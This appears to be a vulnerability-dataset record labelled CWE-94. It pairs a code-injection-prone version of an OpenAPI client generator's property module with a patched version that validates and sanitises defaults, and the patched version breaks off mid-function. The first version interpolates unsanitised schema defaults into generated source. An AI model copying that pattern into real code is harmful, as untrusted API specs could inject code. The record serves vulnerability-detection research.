969,
970,
971,
972,
973,
974,
975,
976,
977,
978,
980,
986,
987,
988,
996,
999,
1000,
1003,
1004,
1005,
1006,
1007,
1008,
1009,
1010,
1011,
1012,
1021,
1029,
1030,
1031,
1032,
1033,
1034,
1035,
1036,
1040,
1041,
1042,
1043,
1044,
1047,
1048,
1049,
1051,
1052,
1053,
1054,
1055,
1056,
1058,
1061,
1065,
1075,
1087,
1089,
1091,
1095,
1097,
1103,
1104,
1105,
1113,
1119,
1134,
1136,
1140,
1141,
1142,
1143,
1146,
1148,
1156,
1157,
1158,
1160,
1173,
1176,
1182,
1184,
1186,
1191,
1195,
1198,
1200,
1202,
1214,
1216,
1224,
1226,
1227,
1228,
1229,
1230,
1240,
1250,
1252,
1256,
1260,
1264,
1267,
1269,
1280,
1288,
1291,
1300,
1302,
1309,
1315,
1320,
1323,
1326,
1328,
1330,
1333,
1334,
1336,
1338,
1347,
1348,
1349,
1350,
1352,
1354,
1356,
1358,
1360,
1361,
1368,
1372,
1377,
1381,
1384,
1386,
1387,
1388,
1389,
1390,
1391,
1392,
1393,
1394,
1395,
1399,
1403,
1404,
1405,
1411,
1412,
1413,
1421,
1422,
1427,
1433,
1434,
1435,
1436,
1437,
1438,
1439,
1441,
1444,
1463,
1470,
1483,
1484,
1485,
1487,
1488,
1495,
1497,
1508,
1516,
1517,
1518,
1522,
1524,
1530,
1537,
1545,
1547,
1548,
1549,
1550,
1551,
1552,
1553,
1554,
1555,
1556,
1557,
1558,
1559,
1561,
1563,
1569,
1571,
1574,
1576,
1578,
1583,
1588,
1592,
1595,
1602,
1606,
1612,
1615,
1616,
1619,
1620,
1621,
1622,
1626,
1629,
1638,
1641,
1643,
1650,
1651,
1654,
1655,
1656,
1663,
1665,
1670,
1672,
1689,
1691,
1692,
1693,
1699,
1706,
1719,
1731,
1735,
1737,
1738,
1745,
1747,
1751,
1757,
1765,
1767,
1769,
1775,
1777,
1781,
1783,
1785,
1789,
1791,
1799,
1804,
1809,
1811,
1815,
1817,
1824,
1828,
1836,
1837,
1839,
1841,
1843,
1845,
1851,
1856,
1859,
1866,
1871,
1877,
1880,
1887,
1897,
1906,
1908,
1920,
1923,
1935,
1942,
1951,
1965,
1967,
1982,
1986,
1992,
1994,
1995,
1997,
2001,
2004,
2010,
2019,
2028,
2032,
2033,
2034,
2035,
2036,
2037,
2039,
2043,
2051,
2055,
2059,
2069,
2077,
2078,
2079,
2087,
2089,
2092,
2095,
2097,
2103,
2109,
2110,
2111,
2114,
2118,
2120,
2121,
2123,
2126,
2127,
2129,
2130,
2131,
2132,
2133,
2134,
2135,
2136,
2137,
2138,
2139,
2140,
2156,
2160,
2161,
2166,
2171,
2177,
2184,
2186,
2187,
2188,
2194,
2195,
2199,
2200,
2201,
2202,
2204,
2206,
2208,
2215,
2216,
2218,
2225,
2229,
2231,
2240,
2247,
2252,
2259,
2265,
2266,
2267,
2268,
2274,
2280,
2282,
2291,
2296,
2300,
2305,
2308,
2313,
2315,
2320,
2321,
2322,
2326,
2327,
2328,
2329,
2334,
2336,
2344,
2345,
2348,
2352,
2356,
2359,
2368,
2373,
2378,
2381,
2383,
2384,
2385,
2386,
2387,
2390,
2394,
2397,
2403,
2404,
2405,
2407,
2415,
2416,
2417,
2418,
2419,
2420,
2421,
2423,
2424,
2425,
2426,
2431,
2436,
2445,
2447,
2451,
2453,
2459,
2462,
2464,
2466,
2470,
2478,
2481,
2483,
2486,
2488,
2489,
2498,
2507,
2513,
2517,
2521,
2523,
2524,
2525,
2526,
2529,
2531,
2532,
2533,
2534,
2535,
2536,
2537,
2540,
2543,
2546,
2548,
2554,
2557,
2559,
2567,
2572,
2577,
2582,
2587,
2588,
2592,
2597,
2599,
2600,
2601,
2602,
2603,
2604,
2605,
2615,
2617,
2621,
2622,
2624,
2626,
2628,
2637,
2643,
2654,
2658,
2663,
2667,
2669,
2670,
2671,
2673,
2679,
2681,
2682,
2690,
2695,
2698,
2701,
2705,
2706,
2707,
2709,
2716,
2723,
2724,
2725,
2727,
2728,
2731,
2747,
2748,
2749,
2750,
2751,
2758,
2759,
2760,
2761,
2769,
2773,
2777,
2786,
2789,
2793,
2796,
2798,
2800,
2801,
2804,
2809,
2817,
2854,
2856,
2857,
2859,
2861,
2865,
2869,
2881,
2890,
2911,
2912,
2913,
2917,
2920,
2922,
2926,
2928,
2934,
2939,
2943,
2944,
2945,
2950,
2955,
2956,
2958,
2965,
2969,
2977,
2983,
2987,
2992,
2995,
2996,
2999,
3000,
3001,
3003,
18,
97,
98,
99,
100,
101,
102,
103,
104,
105,
113,
114,
115,
116,
117,
118,
119,
120,
121,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
430,
431,
432,
433,
434,
435,
436,
568,
569,
570,
571,
572,
573,
574,
575,
576,
577,
578,
579,
580,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
638,
639,
692,
693,
694,
695,
696,
697,
698,
699,
700,
701,
702,
703,
787,
788,
789,
804,
805,
806,
807,
808,
809,
810,
811,
812,
813,
814,
815,
816,
935,
936,
937,
938,
939,
940,
941,
942,
943,
944,
945,
946,
1190,
1191,
1192,
1193,
1194,
1195,
1196,
1197,
1258,
1259,
1260,
1261,
1262,
1263,
1264,
1265,
1266,
1267,
1268,
1269,
1270,
1271,
1272,
1290,
1291,
1292,
1293,
1313,
1314,
1315,
1316,
1317,
1318,
1319,
1320,
1321,
1322,
1323,
1324,
1325,
1326,
1327,
1328,
1329,
1330,
1331,
1332,
1443,
1444,
1445,
1446,
1447,
1448,
1467,
1468,
1469,
1470,
1471,
1472,
1473,
1474,
1475,
1526,
1527,
1528,
1582,
1583,
1584,
1585,
1703,
1704,
1705,
1706,
1707,
1708,
1709,
1710,
1711,
1749,
1779,
1780,
1806,
1807,
1850,
1851,
1852,
1853,
1854,
1855,
1856,
1857,
1858,
1859,
1860,
1861,
1862,
1916,
1917,
1918,
1919,
1920,
1921,
1922,
1961,
1962,
1963,
1964,
1965,
1966,
1967,
1968,
1969,
1970,
1971,
1972,
1973,
1974,
1975,
1976,
2101,
2102,
2103,
2104,
2105,
2106,
2107,
2108,
2239,
2240,
2241,
2242,
2243,
2244,
2245,
2246,
2247,
2248,
2249,
2250,
2251,
2252,
2253,
2254,
2255,
2256,
2290,
2291,
2292,
2293,
2294,
2295,
2296,
2297,
2298,
2299,
2300,
2301,
2302,
2303,
2304,
2305,
2306,
2307,
2308,
2309,
2310,
2311,
2312,
2313,
2314,
2315,
2316,
2317,
2318,
2457,
2458,
2459,
2460,
2461,
2462,
2463,
2464,
2465,
2466,
2467,
2468,
2469,
2511,
2512,
2513,
2514,
2515,
2516,
2517,
2518,
2519,
2520,
2694,
2695,
2696,
2697,
2698,
2699,
2700,
2701,
2702,
2771,
2772,
2773,
2774,
2775,
2776,
2777,
2778,
2779,
2780,
2781,
2782,
2783,
2863,
2864,
2865,
2866,
2867,
2868,
2869,
2870,
2871,
2872,
2873,
2874,
2888,
2889,
2890,
2891,
2892,
2893,
2894,
2895,
2896,
2897,
2898,
2932,
2933,
2934,
2935,
2936,
2937,
2938,
2967,
2968,
2969,
2970,
2971,
2972,
2981,
2982,
2983,
2984,
2985,
2986,
2987,
2988,
2989,
2990,
2991,
1060,
1061,
1062,
1063,
1064,
1065,
1066,
1067,
1068,
1069
] |
5CWE-94
| from __future__ import annotations
from dataclasses import InitVar, dataclass, field
from typing import Any, ClassVar, Dict, Generic, List, Optional, Set, TypeVar, Union
from .. import schema as oai
from .. import utils
from .errors import PropertyError
from .reference import Reference
@dataclass
class Property:
"""
Describes a single property for a schema
Attributes:
template: Name of the template file (if any) to use for this property. Must be stored in
templates/property_templates and must contain two macros: construct and transform. Construct will be used to
build this property from JSON data (a response from an API). Transform will be used to convert this property
to JSON data (when sending a request to the API).
"""
name: str
required: bool
default: Optional[Any]
template: ClassVar[Optional[str]] = None
_type_string: ClassVar[str]
python_name: str = field(init=False)
def __post_init__(self) -> None:
self.python_name = utils.snake_case(self.name)
def get_type_string(self) -> str:
""" Get a string representation of type that should be used when declaring this property """
if self.required:
return self._type_string
return f"Optional[{self._type_string}]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
if not self.required:
return {"from typing import Optional"}
return set()
def to_string(self) -> str:
""" How this should be declared in a dataclass """
if self.default:
default = self.default
elif not self.required:
default = "None"
else:
default = None
if default is not None:
return f"{self.python_name}: {self.get_type_string()} = {self.default}"
else:
return f"{self.python_name}: {self.get_type_string()}"
@dataclass
class StringProperty(Property):
""" A property of type str """
max_length: Optional[int] = None
pattern: Optional[str] = None
_type_string: ClassVar[str] = "str"
def __post_init__(self) -> None:
super().__post_init__()
if self.default is not None:
self.default = f'"{self.default}"'
@dataclass
class DateTimeProperty(Property):
"""
A property of type datetime.datetime
"""
_type_string: ClassVar[str] = "datetime"
template: ClassVar[str] = "datetime_property.pyi"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update({"from datetime import datetime", "from typing import cast"})
return imports
@dataclass
class DateProperty(Property):
""" A property of type datetime.date """
_type_string: ClassVar[str] = "date"
template: ClassVar[str] = "date_property.pyi"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update({"from datetime import date", "from typing import cast"})
return imports
@dataclass
class FileProperty(Property):
""" A property used for uploading files """
_type_string: ClassVar[str] = "File"
template: ClassVar[str] = "file_property.pyi"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update({f"from {prefix}.types import File", "from dataclasses import astuple"})
return imports
@dataclass
class FloatProperty(Property):
""" A property of type float """
default: Optional[float] = None
_type_string: ClassVar[str] = "float"
@dataclass
class IntProperty(Property):
""" A property of type int """
default: Optional[int] = None
_type_string: ClassVar[str] = "int"
@dataclass
class BooleanProperty(Property):
""" Property for bool """
_type_string: ClassVar[str] = "bool"
InnerProp = TypeVar("InnerProp", bound=Property)
@dataclass
class ListProperty(Property, Generic[InnerProp]):
""" A property representing a list (array) of other properties """
inner_property: InnerProp
template: ClassVar[str] = "list_property.pyi"
def __post_init__(self) -> None:
super().__post_init__()
if self.default is not None:
self.default = f"field(default_factory=lambda: cast({self.get_type_string()}, {self.default}))"
def get_type_string(self) -> str:
""" Get a string representation of type that should be used when declaring this property """
if self.required:
return f"List[{self.inner_property.get_type_string()}]"
return f"Optional[List[{self.inner_property.get_type_string()}]]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update(self.inner_property.get_imports(prefix=prefix))
imports.add("from typing import List")
if self.default is not None:
imports.add("from dataclasses import field")
imports.add("from typing import cast")
return imports
@dataclass
class UnionProperty(Property):
""" A property representing a Union (anyOf) of other properties """
inner_properties: List[Property]
template: ClassVar[str] = "union_property.pyi"
def get_type_string(self) -> str:
""" Get a string representation of type that should be used when declaring this property """
inner_types = [p.get_type_string() for p in self.inner_properties]
inner_prop_string = ", ".join(inner_types)
if self.required:
return f"Union[{inner_prop_string}]"
return f"Optional[Union[{inner_prop_string}]]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
for inner_prop in self.inner_properties:
imports.update(inner_prop.get_imports(prefix=prefix))
imports.add("from typing import Union")
return imports
_existing_enums: Dict[str, EnumProperty] = {}
@dataclass
class EnumProperty(Property):
""" A property that should use an enum """
values: Dict[str, str]
reference: Reference = field(init=False)
title: InitVar[str]
template: ClassVar[str] = "enum_property.pyi"
def __post_init__(self, title: str) -> None: # type: ignore
super().__post_init__()
reference = Reference.from_ref(title)
dedup_counter = 0
while reference.class_name in _existing_enums:
existing = _existing_enums[reference.class_name]
if self.values == existing.values:
break # This is the same Enum, we're good
dedup_counter += 1
reference = Reference.from_ref(f"{reference.class_name}{dedup_counter}")
self.reference = reference
inverse_values = {v: k for k, v in self.values.items()}
if self.default is not None:
self.default = f"{self.reference.class_name}.{inverse_values[self.default]}"
_existing_enums[self.reference.class_name] = self
@staticmethod
def get_all_enums() -> Dict[str, EnumProperty]:
""" Get all the EnumProperties that have been registered keyed by class name """
return _existing_enums
@staticmethod
def get_enum(name: str) -> Optional[EnumProperty]:
""" Get all the EnumProperties that have been registered keyed by class name """
return _existing_enums.get(name)
def get_type_string(self) -> str:
""" Get a string representation of type that should be used when declaring this property """
if self.required:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.add(f"from {prefix}.{self.reference.module_name} import {self.reference.class_name}")
return imports
@staticmethod
def values_from_list(values: List[str]) -> Dict[str, str]:
""" Convert a list of values into dict of {name: value} """
output: Dict[str, str] = {}
for i, value in enumerate(values):
if value[0].isalpha():
key = value.upper()
else:
key = f"VALUE_{i}"
if key in output:
raise ValueError(f"Duplicate key {key} in Enum")
output[key] = value
return output
@dataclass
class RefProperty(Property):
""" A property which refers to another Schema """
reference: Reference
@property
def template(self) -> str: # type: ignore
enum = EnumProperty.get_enum(self.reference.class_name)
if enum:
return "enum_property.pyi"
return "ref_property.pyi"
def get_type_string(self) -> str:
""" Get a string representation of type that should be used when declaring this property """
if self.required:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update(
{
f"from {prefix}.{self.reference.module_name} import {self.reference.class_name}",
"from typing import Dict",
"from typing import cast",
}
)
return imports
@dataclass
class DictProperty(Property):
""" Property that is a general Dict """
_type_string: ClassVar[str] = "Dict[Any, Any]"
def __post_init__(self) -> None:
super().__post_init__()
if self.default is not None:
self.default = f"field(default_factory=lambda: cast({self.get_type_string()}, {self.default}))"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.add("from typing import Dict")
if self.default is not None:
imports.add("from dataclasses import field")
imports.add("from typing import cast")
return imports
def _string_based_property(
name: str, required: bool, data: oai.Schema
) -> Union[StringProperty, DateProperty, DateTimeProperty, FileProperty]:
""" Construct a Property from the type "string" """
string_format = data.schema_format
if string_format == "date-time":
return DateTimeProperty(name=name, required=required, default=data.default)
elif string_format == "date":
return DateProperty(name=name, required=required, default=data.default)
elif string_format == "binary":
return FileProperty(name=name, required=required, default=data.default)
else:
return StringProperty(name=name, default=data.default, required=required, pattern=data.pattern)
def property_from_data(
name: str, required: bool, data: Union[oai.Reference, oai.Schema]
) -> Union[Property, PropertyError]:
""" Generate a Property from the OpenAPI dictionary representation of it """
if isinstance(data, oai.Reference):
return RefProperty(name=name, required=required, reference=Reference.from_ref(data.ref), default=None)
if data.enum:
return EnumProperty(
name=name,
required=required,
values=EnumProperty.values_from_list(data.enum),
title=data.title or name,
default=data.default,
)
if data.anyOf:
sub_properties: List[Property] = []
for sub_prop_data in data.anyOf:
sub_prop = property_from_data(name=name, required=required, data=sub_prop_data)
if isinstance(sub_prop, PropertyError):
return PropertyError(detail=f"Invalid property in union {name}", data=sub_prop_data)
sub_properties.append(sub_prop)
return UnionProperty(name=name, required=required, default=data.default, inner_properties=sub_properties)
if not data.type:
return PropertyError(data=data, detail="Schemas must either have one of enum, anyOf, or type defined.")
if data.type == "string":
return _string_based_property(name=name, required=required, data=data)
elif data.type == "number":
return FloatProperty(name=name, default=data.default, required=required)
elif data.type == "integer":
return IntProperty(name=name, default=data.default, required=required)
elif data.type == "boolean":
return BooleanProperty(name=name, required=required, default=data.default)
elif data.type == "array":
if data.items is None:
return PropertyError(data=data, detail="type array must have items defined")
inner_prop = property_from_data(name=f"{name}_item", required=True, data=data.items)
if isinstance(inner_prop, PropertyError):
return PropertyError(data=inner_prop.data, detail=f"invalid data in items of array {name}")
return ListProperty(name=name, required=required, default=data.default, inner_property=inner_prop,)
elif data.type == "object":
return DictProperty(name=name, required=required, default=data.default)
return PropertyError(data=data, detail=f"unknown type {data.type}")
| from __future__ import annotations
from dataclasses import InitVar, dataclass, field
from datetime import date, datetime
from typing import Any, ClassVar, Dict, Generic, List, Optional, Set, TypeVar, Union
from .. import schema as oai
from .. import utils
from .errors import PropertyError, ValidationError
from .reference import Reference
@dataclass
class Property:
    """
    Describes a single property for a schema.

    Attributes:
        template: Name of the template file (if any) to use for this property. Must be stored in
            templates/property_templates and must contain two macros: construct and transform. Construct will be used to
            build this property from JSON data (a response from an API). Transform will be used to convert this property
            to JSON data (when sending a request to the API).

    Raises:
        ValidationError: Raised when the default value fails to be converted to the expected type
    """

    name: str
    required: bool
    default: Optional[Any]

    template: ClassVar[Optional[str]] = None
    _type_string: ClassVar[str]

    # Derived from ``name`` in __post_init__; never passed by callers.
    python_name: str = field(init=False)

    def __post_init__(self) -> None:
        self.python_name = utils.snake_case(self.name)
        if self.default is not None:
            self.default = self._validate_default(default=self.default)

    def _validate_default(self, default: Any) -> Any:
        """ Check that the default value is valid for the property's type + perform any necessary sanitization """
        # Subclasses must override; the base class accepts no defaults.
        raise ValidationError

    def get_type_string(self, no_optional: bool = False) -> str:
        """ Get a string representation of type that should be used when declaring this property """
        if self.required or no_optional:
            return self._type_string
        return f"Optional[{self._type_string}]"

    def get_imports(self, *, prefix: str) -> Set[str]:
        """
        Get a set of import strings that should be included when this property is used somewhere

        Args:
            prefix: A prefix to put before any relative (local) module names.
        """
        if not self.required:
            return {"from typing import Optional"}
        return set()

    def to_string(self) -> str:
        """ How this should be declared in a dataclass """
        # Compare against None explicitly: falsy-but-valid defaults such as
        # 0, 0.0, False, or "" must still be emitted as defaults (a bare
        # truthiness check silently dropped them).
        if self.default is not None:
            return f"{self.python_name}: {self.get_type_string()} = {self.default}"
        if not self.required:
            return f"{self.python_name}: {self.get_type_string()} = None"
        return f"{self.python_name}: {self.get_type_string()}"
@dataclass
class StringProperty(Property):
    """ A property of type str """

    max_length: Optional[int] = None
    pattern: Optional[str] = None
    _type_string: ClassVar[str] = "str"

    def _validate_default(self, default: Any) -> str:
        """ Strip escapes from the default and wrap it in quotes so it is safe to embed in generated source """
        sanitized = utils.remove_string_escapes(default)
        return f'"{sanitized}"'
@dataclass
class DateTimeProperty(Property):
    """ A property of type datetime.datetime """

    _type_string: ClassVar[str] = "datetime.datetime"
    template: ClassVar[str] = "datetime_property.pyi"

    def get_imports(self, *, prefix: str) -> Set[str]:
        """
        Get a set of import strings that should be included when this property is used somewhere

        Args:
            prefix: A prefix to put before any relative (local) module names.
        """
        result = super().get_imports(prefix=prefix)
        result |= {"import datetime", "from typing import cast"}
        return result

    def _validate_default(self, default: Any) -> str:
        """ Accept ISO-8601-style datetimes (with or without a UTC offset) and return their repr """
        accepted_formats = ("%Y-%m-%dT%H:%M:%S", "%Y-%m-%dT%H:%M:%S%z")
        for fmt in accepted_formats:
            try:
                parsed = datetime.strptime(default, fmt)
            except (TypeError, ValueError):
                continue
            return repr(parsed)
        raise ValidationError
@dataclass
class DateProperty(Property):
    """ A property of type datetime.date """

    _type_string: ClassVar[str] = "datetime.date"
    template: ClassVar[str] = "date_property.pyi"

    def get_imports(self, *, prefix: str) -> Set[str]:
        """
        Get a set of import strings that should be included when this property is used somewhere

        Args:
            prefix: A prefix to put before any relative (local) module names.
        """
        result = super().get_imports(prefix=prefix)
        result |= {"import datetime", "from typing import cast"}
        return result

    def _validate_default(self, default: Any) -> str:
        """ Parse the default as an ISO-format date and return its repr """
        try:
            parsed = date.fromisoformat(default)
        except (TypeError, ValueError) as err:
            raise ValidationError() from err
        return repr(parsed)
@dataclass
class FileProperty(Property):
    """ A property used for uploading files """

    _type_string: ClassVar[str] = "File"
    template: ClassVar[str] = "file_property.pyi"

    def get_imports(self, *, prefix: str) -> Set[str]:
        """
        Get a set of import strings that should be included when this property is used somewhere

        Args:
            prefix: A prefix to put before any relative (local) module names.
        """
        result = super().get_imports(prefix=prefix)
        result.add(f"from {prefix}.types import File")
        result.add("from dataclasses import astuple")
        return result
@dataclass
class FloatProperty(Property):
    """ A property of type float """

    default: Optional[float] = None
    _type_string: ClassVar[str] = "float"

    def _validate_default(self, default: Any) -> float:
        """ Coerce the default to a float, raising ValidationError when that is impossible """
        try:
            coerced = float(default)
        except (TypeError, ValueError) as err:
            raise ValidationError() from err
        return coerced
@dataclass
class IntProperty(Property):
    """ A property of type int """

    default: Optional[int] = None
    _type_string: ClassVar[str] = "int"

    def _validate_default(self, default: Any) -> int:
        """ Coerce the default to an int, raising ValidationError when that is impossible """
        try:
            coerced = int(default)
        except (TypeError, ValueError) as err:
            raise ValidationError() from err
        return coerced
@dataclass
class BooleanProperty(Property):
    """ Property for bool """

    _type_string: ClassVar[str] = "bool"

    def _validate_default(self, default: Any) -> bool:
        """ Coerce the default to bool; anything loaded from JSON/YAML is boolable, so no try/except needed """
        return bool(default)
# Type variable constraining ListProperty's element type to Property subclasses.
InnerProp = TypeVar("InnerProp", bound=Property)
@dataclass
class ListProperty(Property, Generic[InnerProp]):
    """ A property representing a list (array) of other properties """

    inner_property: InnerProp
    template: ClassVar[str] = "list_property.pyi"

    def get_type_string(self, no_optional: bool = False) -> str:
        """ Get a string representation of type that should be used when declaring this property """
        inner = self.inner_property.get_type_string()
        if self.required or no_optional:
            return f"List[{inner}]"
        return f"Optional[List[{inner}]]"

    def get_imports(self, *, prefix: str) -> Set[str]:
        """
        Get a set of import strings that should be included when this property is used somewhere

        Args:
            prefix: A prefix to put before any relative (local) module names.
        """
        result = super().get_imports(prefix=prefix)
        result |= self.inner_property.get_imports(prefix=prefix)
        result.add("from typing import List")
        if self.default is not None:
            result |= {"from dataclasses import field", "from typing import cast"}
        return result

    def _validate_default(self, default: Any) -> str:
        """ Validate every element via the inner property and wrap the result in a default_factory expression """
        if not isinstance(default, list):
            raise ValidationError()
        validated = [self.inner_property._validate_default(item) for item in default]
        if isinstance(self.inner_property, RefProperty):
            # Enum members must be rendered without quotes so they reference the actual value
            validated = str(validated).replace("'", "")
        return f"field(default_factory=lambda: cast({self.get_type_string()}, {validated}))"
@dataclass
class UnionProperty(Property):
    """ A property representing a Union (anyOf) of other properties """

    inner_properties: List[Property]
    template: ClassVar[str] = "union_property.pyi"

    def get_type_string(self, no_optional: bool = False) -> str:
        """ Get a string representation of type that should be used when declaring this property """
        inner_types = [p.get_type_string() for p in self.inner_properties]
        inner_prop_string = ", ".join(inner_types)
        if self.required or no_optional:
            return f"Union[{inner_prop_string}]"
        return f"Optional[Union[{inner_prop_string}]]"

    def get_imports(self, *, prefix: str) -> Set[str]:
        """
        Get a set of import strings that should be included when this property is used somewhere

        Args:
            prefix: A prefix to put before any relative (local) module names.
        """
        imports = super().get_imports(prefix=prefix)
        for inner_prop in self.inner_properties:
            imports.update(inner_prop.get_imports(prefix=prefix))
        imports.add("from typing import Union")
        return imports

    def _validate_default(self, default: Any) -> Any:
        """ Return the first member validation that succeeds; raise ValidationError when none do """
        # Loop variable renamed from ``property``, which shadowed the builtin.
        for inner_prop in self.inner_properties:
            try:
                return inner_prop._validate_default(default)
            except ValidationError:
                continue
        raise ValidationError()
# Module-level registry of every EnumProperty created so far, keyed by generated
# class name. Mutated by EnumProperty.__post_init__ for de-duplication and read
# back through EnumProperty.get_all_enums / get_enum.
_existing_enums: Dict[str, EnumProperty] = {}
@dataclass
class EnumProperty(Property):
    """ A property that should use an enum """

    # Mapping of generated enum member name -> rendered value (see values_from_list).
    values: Dict[str, str]
    # Computed in __post_init__ from ``title`` (after de-duplication); not an init arg.
    reference: Reference = field(init=False)
    title: InitVar[str]
    template: ClassVar[str] = "enum_property.pyi"

    def __post_init__(self, title: str) -> None:  # type: ignore
        """Derive a unique class-name reference from ``title`` and register this enum.

        The name is suffixed with an incrementing counter until it is either unused
        or already refers to an enum with identical values (in which case the name
        is shared instead of duplicated).
        """
        reference = Reference.from_ref(title)
        dedup_counter = 0
        while reference.class_name in _existing_enums:
            existing = _existing_enums[reference.class_name]
            if self.values == existing.values:
                break  # This is the same Enum, we're good
            dedup_counter += 1
            reference = Reference.from_ref(f"{reference.class_name}{dedup_counter}")
        self.reference = reference
        # super().__post_init__() may call _validate_default, which reads
        # self.reference — it must already be set, so keep this ordering.
        super().__post_init__()
        _existing_enums[self.reference.class_name] = self

    @staticmethod
    def get_all_enums() -> Dict[str, EnumProperty]:
        """ Get all the EnumProperties that have been registered keyed by class name """
        return _existing_enums

    @staticmethod
    def get_enum(name: str) -> Optional[EnumProperty]:
        """ Get a single registered EnumProperty by class name (None if not registered) """
        return _existing_enums.get(name)

    def get_type_string(self, no_optional: bool = False) -> str:
        """ Get a string representation of type that should be used when declaring this property """
        if self.required or no_optional:
            return self.reference.class_name
        return f"Optional[{self.reference.class_name}]"

    def get_imports(self, *, prefix: str) -> Set[str]:
        """
        Get a set of import strings that should be included when this property is used somewhere

        Args:
            prefix: A prefix to put before any relative (local) module names.
        """
        imports = super().get_imports(prefix=prefix)
        imports.add(f"from {prefix}.{self.reference.module_name} import {self.reference.class_name}")
        return imports

    @staticmethod
    def values_from_list(values: List[str]) -> Dict[str, str]:
        """ Convert a list of values into dict of {name: value} """
        output: Dict[str, str] = {}
        for i, value in enumerate(values):
            if value[0].isalpha():
                key = value.upper()
            else:
                # Values not starting with a letter can't become identifiers directly.
                key = f"VALUE_{i}"
            if key in output:
                raise ValueError(f"Duplicate key {key} in Enum")
            # NOTE(review): duplicates are checked on the raw key, but two distinct
            # raw keys could sanitize to the same identifier — confirm intended.
            sanitized_key = utils.fix_keywords(utils.sanitize(key))
            output[sanitized_key] = utils.remove_string_escapes(value)
        return output

    def _validate_default(self, default: Any) -> str:
        """ Map a raw default value back to its generated enum member (e.g. MyEnum.FOO) """
        inverse_values = {v: k for k, v in self.values.items()}
        try:
            return f"{self.reference.class_name}.{inverse_values[default]}"
        except KeyError as e:
            raise ValidationError() from e
@dataclass
class RefProperty(Property):
    """ A property which refers to another Schema """

    reference: Reference

    @property
    def template(self) -> str:  # type: ignore
        """ Use the enum template when the referenced schema is a registered enum, else the plain ref template """
        if EnumProperty.get_enum(self.reference.class_name) is not None:
            return "enum_property.pyi"
        return "ref_property.pyi"

    def get_type_string(self, no_optional: bool = False) -> str:
        """ Get a string representation of type that should be used when declaring this property """
        class_name = self.reference.class_name
        if self.required or no_optional:
            return class_name
        return f"Optional[{class_name}]"

    def get_imports(self, *, prefix: str) -> Set[str]:
        """
        Get a set of import strings that should be included when this property is used somewhere

        Args:
            prefix: A prefix to put before any relative (local) module names.
        """
        result = super().get_imports(prefix=prefix)
        result.add(f"from {prefix}.{self.reference.module_name} import {self.reference.class_name}")
        result.add("from typing import Dict")
        result.add("from typing import cast")
        return result

    def _validate_default(self, default: Any) -> Any:
        """ Defaults are only supported when the ref points at a registered enum """
        enum = EnumProperty.get_enum(self.reference.class_name)
        if enum is None:
            raise ValidationError
        return enum._validate_default(default)
@dataclass
class DictProperty(Property):
    """ Property that is a general Dict """

    _type_string: ClassVar[str] = "Dict[Any, Any]"
    template: ClassVar[str] = "dict_property.pyi"

    def get_imports(self, *, prefix: str) -> Set[str]:
        """
        Get a set of import strings that should be included when this property is used somewhere

        Args:
            prefix: A prefix to put before any relative (local) module names.
        """
        result = super().get_imports(prefix=prefix)
        result.add("from typing import Dict")
        if self.default is not None:
            result |= {"from dataclasses import field", "from typing import cast"}
        return result

    def _validate_default(self, default: Any) -> str:
        """ Only dict literals are accepted as defaults; render them with repr """
        if not isinstance(default, dict):
            raise ValidationError
        return repr(default)
def _string_based_property(
    name: str, required: bool, data: oai.Schema
) -> Union[StringProperty, DateProperty, DateTimeProperty, FileProperty]:
    """ Construct a Property from the type "string" """
    # Dispatch on the schema's "format" field; anything unrecognized is a plain string.
    format_classes = {
        "date-time": DateTimeProperty,
        "date": DateProperty,
        "binary": FileProperty,
    }
    prop_class = format_classes.get(data.schema_format)
    if prop_class is not None:
        return prop_class(name=name, required=required, default=data.default)
    return StringProperty(name=name, default=data.default, required=required, pattern=data.pattern)
def _property_from_data(
    name: str, required: bool, data: Union[oai.Reference, oai.Schema]
) -> Union[Property, PropertyError]:
    """ Generate a Property from the OpenAPI dictionary representation of it """
    name = utils.remove_string_escapes(name)

    # A $ref never carries its own type/enum/anyOf — resolve it first.
    if isinstance(data, oai.Reference):
        return RefProperty(name=name, required=required, reference=Reference.from_ref(data.ref), default=None)
    if data.enum:
        return EnumProperty(
            name=name,
            required=required,
            values=EnumProperty.values_from_list(data.enum),
            title=data.title or name,
            default=data.default,
        )
    if data.anyOf:
        variants: List[Property] = []
        for variant_data in data.anyOf:
            variant = property_from_data(name=name, required=required, data=variant_data)
            if isinstance(variant, PropertyError):
                return PropertyError(detail=f"Invalid property in union {name}", data=variant_data)
            variants.append(variant)
        return UnionProperty(name=name, required=required, default=data.default, inner_properties=variants)
    if not data.type:
        return PropertyError(data=data, detail="Schemas must either have one of enum, anyOf, or type defined.")

    if data.type == "string":
